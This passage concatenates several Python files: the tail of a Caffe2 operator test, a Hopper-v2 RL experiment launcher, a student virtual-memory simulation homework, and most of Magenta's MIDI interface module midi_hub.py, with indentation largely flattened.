else:
Z = npm.repmat(Y, 1, M // K)
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10), **hu.gcs_cpu_only)
def test_ensure_dense(self, N, M, gc, dc):
# in place
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "X")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
# or not
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "out")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
@given(N=st.integers(min_value=10, max_value=100),
M=st.integers(min_value=2, max_value=10),
num_buckets=st.integers(min_value=1, max_value=5),
**hu.gcs_cpu_only)
def test_accumulate_histogram_op(self, N, M, num_buckets, gc, dc):
X = np.random.rand(N, M).astype(np.float32)
lower_bound, upper_bound = 0.1, 0.9
op = core.CreateOperator("AccumulateHistogram", ["X"],
['cur_hist', 'acc_hist'],
lower_bound=lower_bound,
upper_bound=upper_bound,
num_buckets=num_buckets)
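        # Bucket 0 collects values below lower_bound, bucket
        # num_buckets + 1 collects values at or above upper_bound, and the
        # interior buckets split [lower_bound, upper_bound) evenly.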
def histogram(X):
hist = np.zeros((num_buckets + 2, ), dtype=np.int32)
segment = (upper_bound - lower_bound) / num_buckets
Y = np.zeros((N, M), dtype=np.int32)
Y[X < lower_bound] = 0
Y[X >= upper_bound] = num_buckets + 1
Y[(X >= lower_bound) & (X < upper_bound)] = \
((X[(X >= lower_bound) & (X < upper_bound)] - lower_bound) /
segment + 1).astype(np.int32)
for i in range(Y.shape[0]):
for j in range(Y.shape[1]):
hist[Y[i][j]] += 1
cur_hist, acc_hist = hist, hist
return [cur_hist, acc_hist]
self.assertDeviceChecks(dc, op, [X], [0, 1])
self.assertReferenceChecks(gc, op, [X], histogram)
if __name__ == "__main__":
unittest.main()
|
hopper-v2.py
|
import os
import random
from multiprocessing import Process, Queue
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--pgmorl', default=False, action='store_true')
parser.add_argument('--ra', default=False, action='store_true')
parser.add_argument('--pfa', default=False, action='store_true')
parser.add_argument('--moead', default=False, action='store_true')
parser.add_argument('--random', default=False, action='store_true')
parser.add_argument('--num-seeds', type=int, default=6)
parser.add_argument('--num-processes',
type=int,
default=1,
                    help='number of algorithms to run in parallel (note: each algorithm needs 4 * num-tasks processors by default, so the total number of processors used is 4 * num-tasks * num-processes)')
parser.add_argument('--save-dir', type=str, default='./results/Hopper-v2')
args = parser.parse_args()
random.seed(2000)
commands = []
save_dir = args.save_dir
test_pgmorl = args.pgmorl
test_ra = args.ra
test_random = args.random
test_pfa = args.pfa
test_moead = args.moead
for i in range(args.num_seeds):
seed = random.randint(0, 1000000)
if test_pgmorl:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method prediction-guided '\
'--num-weight-candidates 7 '\
'--num-tasks 6 '\
'--sparsity 1.0 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pgmorl/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_ra:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method ra '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/ra/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_random:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method random '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/random/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_pfa:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method pfa '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pfa/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_moead:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method moead '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/moead/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
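# Editor's note: the worker follows the standard sentinel pattern — it
# consumes commands until it reads the 'STOP' marker, and always reports
# 'done' when it exits (preceded by a 'killed' report if a command failed).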
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
ece565hw03code.py
|
#!/usr/bin/python
# Daniel Noyes, ECE565F2015 HW#3
#
# HW#3 Simulate a virtual memory system with multiprogramming,
# e.g., Pthreads. Assume that your machine has 4-bit virtual
# addresses and 8-bit physical address with 2 Byte page size.
# You need to implement two processes/threads:
# 1) Virtual Address Generation – generates a sequence of 4-bit
# random number, as virtual addresses, and writes them into an
# integer buffer of size N.
# 2) Address Translation – reads the next virtual address from
# the buffer and translates it to a physical address, keeping
# track of page faults as occurring.
# Test your system on my file “ece565hw03.txt” that contains the
# page table for your starting point.
#
# Programming Language : Python
# Environment: Linux
# Instructions: run in bash "python ece565hw03code.py ece565hw03.txt"
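# Worked example (editor's note): with 2-byte pages, the 4-bit virtual
# address 13 (0b1101) splits into page = 13 // 2 = 6 and offset = 13 % 2 = 1;
# if the table maps page 6 to frame 3, the 8-bit physical address is
# frame * 2 + offset = 7.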
import sys
import os
import argparse
import random
import time
from multiprocessing import Process, Queue
#input Parser
parser = argparse.ArgumentParser(description='HW 3 Virtual memory system')
parser.add_argument("-i", "--input", dest='INPUT', help="Input File")
parser.add_argument("-o", "--output", dest='OUTPUT', help="Output File")
parser.add_argument("-d", "--debug", dest='DEBUG', help="Enable Debugging Mode", action='store_true')
global args
args = parser.parse_args()
#setup output file
if args.OUTPUT:
sys.stdout = open(args.OUTPUT, "w")
#Pagetable Class
class pagetable:
#INIT
def __init__(self):
self.frame = []
self.valid = []
self.size = 8 #Page Table Size
def info(self):
print("Page table: " + str(self.size))
for i in range(0,self.size):
print(str(self.frame[i]) + ":" + str(self.valid[i]))
def append(self,frame,valid):
self.frame.append(frame)
self.valid.append(valid)
    def p(self, page):
        return self.frame[page]
    def v(self, page):
        return self.valid[page]
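# e.g., table.frame[6] holds the frame number string for page 6 and
# table.valid[6] is its valid flag ('v' when the mapping is valid).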
#parseprocess: Parses the page-table text file and builds the page table
def parseprocess(textfile):
table = pagetable()
text = open(textfile)
for line in text:
if line != '\n':
parse = line.split()
table.append(parse[0],parse[1])
text.close()
if args.DEBUG:
print("Table inported")
table.info()
return table
#Virtual Address Generator:
def vadrsgen(que):
while True:
num = random.getrandbits(4)
print("VA:" + "%2d" % num + " | ", end="",flush=True)
que.put(num)
time.sleep(1)
#Address Translation:
def adrstran(table,que):
while True:
num = que.get()
#Calculate various specifications
        page = num // 2
offset = num % 2
valid = table.valid[int(page)]
print("PAGE" + "%2d" % page + " | " + "OFFSET" + "%2d" % offset + " | " + "VALID " + str(valid), end="",flush=True)
if valid == 'v':
frame = int(table.frame[int(page)])
phyadrs = frame * 2 + offset
print(" | " + "FRAME" + "%2d" % frame + " | " + "PHYADRS " + "%2d" % phyadrs)
else:
print(" | " + "PAGE FAULT!")
#main routine
def main():
print('Starting virtual memory Simulation')
table = parseprocess(args.INPUT)
    que = Queue() #Queue to send data back and forth
#Virtual Address Generator Process
randp = Process(target=vadrsgen,args=(que,))
randp.start()
#Address Translation Process
adrsp = Process(target=adrstran,args=(table,que,))
adrsp.start()
#Waits till the simulation is ctrl-c
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print("Exiting Simulation")
break
randp.terminate()
adrsp.terminate()
sys.exit(0)
#Main Run routine
if __name__ == "__main__":
main()
|
midi_hub.py
|
# Copyright 2018 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module for interfacing with the MIDI environment."""
# TODO(adarob): Use flattened imports.
import abc
import collections
import re
import threading
import time
from magenta.common import concurrency
from magenta.protobuf import music_pb2
import mido
from six.moves import queue as Queue
import tensorflow as tf
_DEFAULT_METRONOME_TICK_DURATION = 0.05
_DEFAULT_METRONOME_PROGRAM = 117 # Melodic Tom
_DEFAULT_METRONOME_MESSAGES = [
mido.Message(type='note_on', note=44, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
]
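# Editor's note: one tick message per beat of a 4/4 bar, with a distinct
# pitch (44) on the downbeat and pitch 35 on the remaining beats.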
_DEFAULT_METRONOME_CHANNEL = 1
# 0-indexed.
_DRUM_CHANNEL = 9
try:
# The RtMidi backend is easier to install and has support for virtual ports.
import rtmidi # pylint: disable=unused-import,g-import-not-at-top
mido.set_backend('mido.backends.rtmidi')
except ImportError:
# Tries to use PortMidi backend by default.
tf.logging.warn('Could not import RtMidi. Virtual ports are disabled.')
class MidiHubError(Exception): # pylint:disable=g-bad-exception-name
"""Base class for exceptions in this module."""
pass
def get_available_input_ports():
"""Returns a list of available input MIDI ports."""
return mido.get_input_names()
def get_available_output_ports():
"""Returns a list of available output MIDI ports."""
return mido.get_output_names()
class MidiSignal(object):
"""A class for representing a MIDI-based event signal.
Provides a `__str__` method to return a regular expression pattern for
matching against the string representation of a mido.Message with wildcards
for unspecified values.
Supports matching for message types 'note_on', 'note_off', and
'control_change'. If a mido.Message is given as the `msg` argument, matches
against the exact message, ignoring the time attribute. If a `msg` is
not given, keyword arguments must be provided matching some non-empty subset
of those listed as a value for at least one key in `_VALID_ARGS`.
Examples:
# A signal that matches any 'note_on' message.
note_on_signal = MidiSignal(type='note_on')
# A signal that matches any 'note_on' or 'note_off' message with a pitch
# value of 4 and a velocity of 127.
note_signal = MidiSignal(note=4, velocity=127)
# A signal that matches a specific mido.Message exactly (ignoring time).
    msg = mido.Message(type='control_change', control=1, value=127)
control_1_127_signal = MidiSignal(msg=msg)
Args:
msg: A mido.Message that should be matched exactly (excluding the time
attribute) or None if wildcards are to be used.
**kwargs: Valid mido.Message arguments. Those that are not provided will be
treated as wildcards.
Raises:
MidiHubError: If the message type is unsupported or the arguments are
not in the valid set for the given or inferred type.
"""
_NOTE_ARGS = set(['type', 'note', 'program_number', 'velocity'])
_CONTROL_ARGS = set(['type', 'control', 'value'])
_VALID_ARGS = {
'note_on': _NOTE_ARGS,
'note_off': _NOTE_ARGS,
'control_change': _CONTROL_ARGS,
}
def __init__(self, msg=None, **kwargs):
if msg is not None and kwargs:
raise MidiHubError(
'Either a mido.Message should be provided or arguments. Not both.')
type_ = msg.type if msg is not None else kwargs.get('type')
if 'type' in kwargs:
del kwargs['type']
if type_ is not None and type_ not in self._VALID_ARGS:
raise MidiHubError(
"The type of a MidiSignal must be either 'note_on', 'note_off', "
"'control_change' or None for wildcard matching. Got '%s'." % type_)
# The compatible mido.Message types.
inferred_types = [type_] if type_ is not None else []
# If msg is not provided, check that the given arguments are valid for some
# message type.
if msg is None:
if type_ is not None:
for arg_name in kwargs:
if arg_name not in self._VALID_ARGS[type_]:
raise MidiHubError(
"Invalid argument for type '%s': %s" % (type_, arg_name))
else:
if kwargs:
for name, args in self._VALID_ARGS.items():
if set(kwargs) <= args:
inferred_types.append(name)
if not inferred_types:
raise MidiHubError(
'Could not infer a message type for set of given arguments: %s'
% ', '.join(kwargs))
# If there is only a single valid inferred type, use it.
if len(inferred_types) == 1:
type_ = inferred_types[0]
self._msg = msg
self._kwargs = kwargs
self._type = type_
self._inferred_types = inferred_types
def to_message(self):
"""Returns a message using the signal's specifications, if possible."""
if self._msg:
return self._msg
if not self._type:
raise MidiHubError('Cannot build message if type is not inferrable.')
return mido.Message(self._type, **self._kwargs)
def __str__(self):
"""Returns a regex pattern for matching against a mido.Message string."""
if self._msg is not None:
regex_pattern = '^' + mido.messages.format_as_string(
self._msg, include_time=False) + r' time=\d+.\d+$'
else:
# Generate regex pattern.
parts = ['.*' if self._type is None else self._type]
for name in mido.messages.SPEC_BY_TYPE[self._inferred_types[0]][
'value_names']:
if name in self._kwargs:
parts.append('%s=%d' % (name, self._kwargs[name]))
else:
parts.append(r'%s=\d+' % name)
regex_pattern = '^' + ' '.join(parts) + r' time=\d+.\d+$'
return regex_pattern
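# Illustration (editor's sketch): str(MidiSignal(type='note_on', note=60))
# yields a pattern like
#   r'^note_on channel=\d+ note=60 velocity=\d+ time=\d+.\d+$'
# which matches any note_on for pitch 60 whose time attribute has been
# stamped with a wall-clock float.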
class Metronome(threading.Thread):
"""A thread implementing a MIDI metronome.
Args:
outport: The Mido port for sending messages.
qpm: The integer quarters per minute to signal on.
start_time: The float wall time in seconds to treat as the first beat
for alignment. If in the future, the first tick will not start until
after this time.
stop_time: The float wall time in seconds after which the metronome should
stop, or None if it should continue until `stop` is called.
program: The MIDI program number to use for metronome ticks.
signals: An ordered collection of MidiSignals whose underlying messages are
to be output on the metronome's tick, cyclically. A None value can be
used in place of a MidiSignal to output nothing on a given tick.
duration: The duration of the metronome's tick.
channel: The MIDI channel to output on.
"""
daemon = True
def __init__(self,
outport,
qpm,
start_time,
stop_time=None,
program=_DEFAULT_METRONOME_PROGRAM,
signals=None,
duration=_DEFAULT_METRONOME_TICK_DURATION,
channel=None):
self._outport = outport
self.update(
qpm, start_time, stop_time, program, signals, duration, channel)
super(Metronome, self).__init__()
def update(self,
qpm,
start_time,
stop_time=None,
program=_DEFAULT_METRONOME_PROGRAM,
signals=None,
duration=_DEFAULT_METRONOME_TICK_DURATION,
channel=None):
"""Updates Metronome options."""
# Locking is not required since variables are independent and assignment is
# atomic.
self._channel = _DEFAULT_METRONOME_CHANNEL if channel is None else channel
# Set the program number for the channels.
self._outport.send(
mido.Message(
type='program_change', program=program, channel=self._channel))
self._period = 60. / qpm
self._start_time = start_time
self._stop_time = stop_time
if signals is None:
self._messages = _DEFAULT_METRONOME_MESSAGES
else:
self._messages = [s.to_message() if s else None for s in signals]
self._duration = duration
def run(self):
"""Sends message on the qpm interval until stop signal received."""
sleeper = concurrency.Sleeper()
while True:
now = time.time()
tick_number = max(0, int((now - self._start_time) // self._period) + 1)
tick_time = tick_number * self._period + self._start_time
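      # e.g., at qpm=120 the period is 0.5s, so a `now` 1.2s past
      # `start_time` yields tick_number 3 and a tick_time 1.5s past
      # `start_time`, the next beat boundary.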
if self._stop_time is not None and self._stop_time < tick_time:
break
sleeper.sleep_until(tick_time)
metric_position = tick_number % len(self._messages)
tick_message = self._messages[metric_position]
if tick_message is None:
continue
tick_message.channel = self._channel
self._outport.send(tick_message)
if tick_message.type == 'note_on':
sleeper.sleep(self._duration)
end_tick_message = mido.Message(
'note_off', note=tick_message.note, channel=self._channel)
self._outport.send(end_tick_message)
def stop(self, stop_time=0, block=True):
"""Signals for the metronome to stop.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until thread terminates.
"""
self._stop_time = stop_time
if block:
self.join()
class MidiPlayer(threading.Thread):
"""A thread for playing back a NoteSequence proto via MIDI.
The NoteSequence times must be based on the wall time. The playhead matches
the wall clock. The playback sequence may be updated at any time if
`allow_updates` is set to True.
Args:
outport: The Mido port for sending messages.
sequence: The NoteSequence to play.
start_time: The float time before which to strip events. Defaults to
construction time. Events before this time will be sent immediately on
start.
allow_updates: If False, the thread will terminate after playback of
`sequence` completes and calling `update_sequence` will result in an
      exception. Otherwise, the thread will stay alive until `stop` is
called, allowing for additional updates via `update_sequence`.
channel: The MIDI channel to send playback events.
offset: The float time in seconds to adjust the playback event times by.
"""
def __init__(self, outport, sequence, start_time=time.time(),
allow_updates=False, channel=0, offset=0.0):
self._outport = outport
self._channel = channel
self._offset = offset
# Set of notes (pitches) that are currently on.
self._open_notes = set()
# Lock for serialization.
self._lock = threading.RLock()
# A control variable to signal when the sequence has been updated.
self._update_cv = threading.Condition(self._lock)
# The queue of mido.Message objects to send, sorted by ascending time.
self._message_queue = collections.deque()
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Initialize message queue.
# We first have to allow "updates" to set the initial sequence.
self._allow_updates = True
self.update_sequence(sequence, start_time=start_time)
# We now make whether we allow updates dependent on the argument.
self._allow_updates = allow_updates
super(MidiPlayer, self).__init__()
@concurrency.serialized
def update_sequence(self, sequence, start_time=None):
"""Updates sequence being played by the MidiPlayer.
Adds events to close any notes that are no longer being closed by the
new sequence using the times when they would have been closed by the
previous sequence.
Args:
sequence: The NoteSequence to play back.
start_time: The float time before which to strip events. Defaults to call
time.
Raises:
MidiHubError: If called when _allow_updates is False.
"""
if start_time is None:
start_time = time.time()
if not self._allow_updates:
raise MidiHubError(
'Attempted to update a MidiPlayer sequence with updates disabled.')
new_message_list = []
# The set of pitches that are already playing and will be closed without
    # first being reopened in the new sequence.
closed_notes = set()
for note in sequence.notes:
if note.start_time >= start_time:
new_message_list.append(
mido.Message(type='note_on', note=note.pitch,
velocity=note.velocity, time=note.start_time))
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
elif note.end_time >= start_time and note.pitch in self._open_notes:
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
closed_notes.add(note.pitch)
# Close remaining open notes at the next event time to avoid abruptly ending
# notes.
notes_to_close = self._open_notes - closed_notes
if notes_to_close:
next_event_time = (
min(msg.time for msg in new_message_list) if new_message_list else 0)
for note in notes_to_close:
new_message_list.append(
mido.Message(type='note_off', note=note, time=next_event_time))
for msg in new_message_list:
msg.channel = self._channel
msg.time += self._offset
self._message_queue = collections.deque(
sorted(new_message_list, key=lambda msg: (msg.time, msg.note)))
self._update_cv.notify()
@concurrency.serialized
def run(self):
"""Plays messages in the queue until empty and _allow_updates is False."""
# Assumes model where NoteSequence is time-stamped with wall time.
# TODO(hanzorama): Argument to allow initial start not at sequence start?
while self._message_queue and self._message_queue[0].time < time.time():
self._message_queue.popleft()
while True:
while self._message_queue:
delta = self._message_queue[0].time - time.time()
if delta > 0:
self._update_cv.wait(timeout=delta)
else:
msg = self._message_queue.popleft()
if msg.type == 'note_on':
self._open_notes.add(msg.note)
elif msg.type == 'note_off':
self._open_notes.discard(msg.note)
self._outport.send(msg)
# Either keep player alive and wait for sequence update, or return.
if self._allow_updates:
self._update_cv.wait()
else:
break
def stop(self, block=True):
"""Signals for the playback to stop and ends all open notes.
Args:
block: If true, blocks until thread terminates.
"""
with self._lock:
if not self._stop_signal.is_set():
self._stop_signal.set()
self._allow_updates = False
# Replace message queue with immediate end of open notes.
self._message_queue.clear()
for note in self._open_notes:
self._message_queue.append(
mido.Message(type='note_off', note=note, time=time.time()))
self._update_cv.notify()
if block:
self.join()
class MidiCaptor(threading.Thread):
"""Base class for thread that captures MIDI into a NoteSequence proto.
  If neither `stop_time` nor `stop_signal` is provided as an argument, the
capture will continue until the `stop` method is called.
Args:
qpm: The quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds when the capture begins. Events
      occurring before this time are ignored.
stop_time: The float wall time in seconds when the capture is to be stopped
or None.
stop_signal: A MidiSignal to use as a signal to stop capture.
"""
  __metaclass__ = abc.ABCMeta
# A message that is used to wake the consumer thread.
_WAKE_MESSAGE = None
def __init__(self, qpm, start_time=0, stop_time=None, stop_signal=None):
# A lock for synchronization.
self._lock = threading.RLock()
self._receive_queue = Queue.Queue()
self._captured_sequence = music_pb2.NoteSequence()
self._captured_sequence.tempos.add(qpm=qpm)
self._start_time = start_time
self._stop_time = stop_time
self._stop_regex = re.compile(str(stop_signal))
# A set of active MidiSignals being used by iterators.
self._iter_signals = []
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Active callback threads keyed by unique thread name.
self._callbacks = {}
super(MidiCaptor, self).__init__()
@property
@concurrency.serialized
def start_time(self):
return self._start_time
@start_time.setter
@concurrency.serialized
def start_time(self, value):
"""Updates the start time, removing any notes that started before it."""
self._start_time = value
i = 0
for note in self._captured_sequence.notes:
if note.start_time >= self._start_time:
break
i += 1
del self._captured_sequence.notes[:i]
@property
@concurrency.serialized
def _stop_time(self):
return self._stop_time_unsafe
@_stop_time.setter
@concurrency.serialized
def _stop_time(self, value):
self._stop_time_unsafe = value
def receive(self, msg):
"""Adds received mido.Message to the queue for capture.
Args:
msg: The incoming mido.Message object to add to the queue for capture. The
time attribute is assumed to be pre-set with the wall time when the
message was received.
Raises:
MidiHubError: When the received message has an empty time attribute.
"""
if not msg.time:
raise MidiHubError(
'MidiCaptor received message with empty time attribute: %s' % msg)
self._receive_queue.put(msg)
@abc.abstractmethod
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Must be serialized in children.
Args:
msg: The incoming mido.Message object to capture. The time field is
assumed to be pre-filled with the wall time when the message was
received.
"""
pass
def _add_note(self, msg):
"""Adds and returns a new open note based on the MIDI message."""
new_note = self._captured_sequence.notes.add()
new_note.start_time = msg.time
new_note.pitch = msg.note
new_note.velocity = msg.velocity
new_note.is_drum = (msg.channel == _DRUM_CHANNEL)
return new_note
def run(self):
"""Captures incoming messages until stop time or signal received."""
while True:
timeout = None
stop_time = self._stop_time
if stop_time is not None:
timeout = stop_time - time.time()
if timeout <= 0:
break
try:
msg = self._receive_queue.get(block=True, timeout=timeout)
except Queue.Empty:
continue
if msg is MidiCaptor._WAKE_MESSAGE:
continue
if msg.time <= self._start_time:
continue
if self._stop_regex.match(str(msg)) is not None:
break
with self._lock:
msg_str = str(msg)
for regex, queue in self._iter_signals:
if regex.match(msg_str) is not None:
queue.put(msg.copy())
self._capture_message(msg)
stop_time = self._stop_time
end_time = stop_time if stop_time is not None else msg.time
# Acquire lock to avoid race condition with `iterate`.
with self._lock:
# Set final captured sequence.
self._captured_sequence = self.captured_sequence(end_time)
# Wake up all generators.
for regex, queue in self._iter_signals:
queue.put(MidiCaptor._WAKE_MESSAGE)
def stop(self, stop_time=None, block=True):
"""Ends capture and truncates the captured sequence at `stop_time`.
Args:
stop_time: The float time in seconds to stop the capture, or None if it
should be stopped now. May be in the past, in which case the captured
sequence will be truncated appropriately.
block: If True, blocks until the thread terminates.
Raises:
MidiHubError: When called multiple times with a `stop_time`.
"""
with self._lock:
if self._stop_signal.is_set():
if stop_time is not None:
raise MidiHubError(
'`stop` must not be called multiple times with a `stop_time` on '
'MidiCaptor.')
else:
self._stop_signal.set()
self._stop_time = time.time() if stop_time is None else stop_time
# Force the thread to wake since we've updated the stop time.
self._receive_queue.put(MidiCaptor._WAKE_MESSAGE)
if block:
self.join()
def captured_sequence(self, end_time=None):
"""Returns a copy of the current captured sequence.
If called before the thread terminates, `end_time` is required and any open
notes will have their end time set to it, any notes starting after it will
be removed, and any notes ending after it will be truncated. `total_time`
will also be set to `end_time`.
Args:
end_time: The float time in seconds to close any open notes and after
which to close or truncate notes, if the thread is still alive.
Otherwise, must be None.
Returns:
A copy of the current captured NoteSequence proto with open notes closed
at and later notes removed or truncated to `end_time`.
Raises:
MidiHubError: When the thread is alive and `end_time` is None or the
thread is terminated and `end_time` is not None.
"""
# Make a copy of the sequence currently being captured.
current_captured_sequence = music_pb2.NoteSequence()
with self._lock:
current_captured_sequence.CopyFrom(self._captured_sequence)
if self.is_alive():
if end_time is None:
raise MidiHubError(
'`end_time` must be provided when capture thread is still running.')
for i, note in enumerate(current_captured_sequence.notes):
if note.start_time >= end_time:
del current_captured_sequence.notes[i:]
break
if not note.end_time or note.end_time > end_time:
note.end_time = end_time
current_captured_sequence.total_time = end_time
elif end_time is not None:
raise MidiHubError(
'`end_time` must not be provided when capture is complete.')
return current_captured_sequence
def iterate(self, signal=None, period=None):
"""Yields the captured sequence at every signal message or time period.
Exactly one of `signal` or `period` must be specified. Continues until the
captor terminates, at which point the final captured sequence is yielded
before returning.
If consecutive calls to iterate are longer than the period, immediately
yields and logs a warning.
Args:
signal: A MidiSignal to use as a signal to yield, or None.
period: A float period in seconds, or None.
Yields:
The captured NoteSequence at event time.
Raises:
      MidiHubError: If neither or both of `signal` and `period` are specified.
"""
if (signal, period).count(None) != 1:
raise MidiHubError(
'Exactly one of `signal` or `period` must be provided to `iterate` '
'call.')
if signal is None:
sleeper = concurrency.Sleeper()
next_yield_time = time.time() + period
else:
regex = re.compile(str(signal))
queue = Queue.Queue()
with self._lock:
self._iter_signals.append((regex, queue))
while self.is_alive():
if signal is None:
skipped_periods = (time.time() - next_yield_time) // period
if skipped_periods > 0:
tf.logging.warn(
'Skipping %d %.3fs period(s) to catch up on iteration.',
skipped_periods, period)
next_yield_time += skipped_periods * period
else:
sleeper.sleep_until(next_yield_time)
end_time = next_yield_time
next_yield_time += period
else:
signal_msg = queue.get()
if signal_msg is MidiCaptor._WAKE_MESSAGE:
          # This is only received when the thread is in the process of
# terminating. Wait until it is done before yielding the final
# sequence.
self.join()
break
end_time = signal_msg.time
# Acquire lock so that `captured_sequence` will be called before thread
# terminates, if it has not already done so.
with self._lock:
if not self.is_alive():
break
captured_sequence = self.captured_sequence(end_time)
yield captured_sequence
yield self.captured_sequence()
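  # Usage sketch (editor's illustration): with a started MidiCaptor
  # `captor`, `for seq in captor.iterate(period=1.0): ...` yields the
  # current captured NoteSequence roughly once per second until capture
  # stops, with the final sequence yielded last.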
def register_callback(self, fn, signal=None, period=None):
"""Calls `fn` at every signal message or time period.
The callback function must take exactly one argument, which will be the
current captured NoteSequence.
Exactly one of `signal` or `period` must be specified. Continues until the
captor thread terminates, at which point the callback is called with the
final sequence, or `cancel_callback` is called.
If callback execution is longer than a period, immediately calls upon
completion and logs a warning.
Args:
fn: The callback function to call, passing in the captured sequence.
signal: A MidiSignal to use as a signal to call `fn` on the current
captured sequence, or None.
period: A float period in seconds to specify how often to call `fn`, or
None.
Returns:
      The unique name of the callback thread to enable cancellation.
Raises:
      MidiHubError: If neither or both of `signal` and `period` are specified.
"""
class IteratorCallback(threading.Thread):
"""A thread for executing a callback on each iteration."""
def __init__(self, iterator, fn):
self._iterator = iterator
self._fn = fn
self._stop_signal = threading.Event()
super(IteratorCallback, self).__init__()
def run(self):
"""Calls the callback function for each iterator value."""
for captured_sequence in self._iterator:
if self._stop_signal.is_set():
break
self._fn(captured_sequence)
def stop(self):
"""Stops the thread on next iteration, without blocking."""
self._stop_signal.set()
t = IteratorCallback(self.iterate(signal, period), fn)
t.start()
with self._lock:
assert t.name not in self._callbacks
self._callbacks[t.name] = t
return t.name
@concurrency.serialized
def cancel_callback(self, name):
"""Cancels the callback with the given name.
While the thread may continue to run until the next iteration, the callback
function will not be executed.
Args:
name: The unique name of the callback thread to cancel.
"""
self._callbacks[name].stop()
del self._callbacks[name]
class MonophonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for monophonic melodies."""
def __init__(self, *args, **kwargs):
self._open_note = None
super(MonophonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
If the message is a note_on event, ends the previous note (if applicable)
and opens a new note in the capture sequence. Ignores repeated note_on
events.
    If the message is a note_off event matching the current open note in the
    capture sequence, ends that note.
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if self._open_note is None or msg.note != self._open_note.pitch:
# This is not the note we're looking for. Drop it.
return
self._open_note.end_time = msg.time
self._open_note = None
elif msg.type == 'note_on':
if self._open_note:
if self._open_note.pitch == msg.note:
# This is just a repeat of the previous message.
return
# End the previous note.
self._open_note.end_time = msg.time
self._open_note = self._add_note(msg)
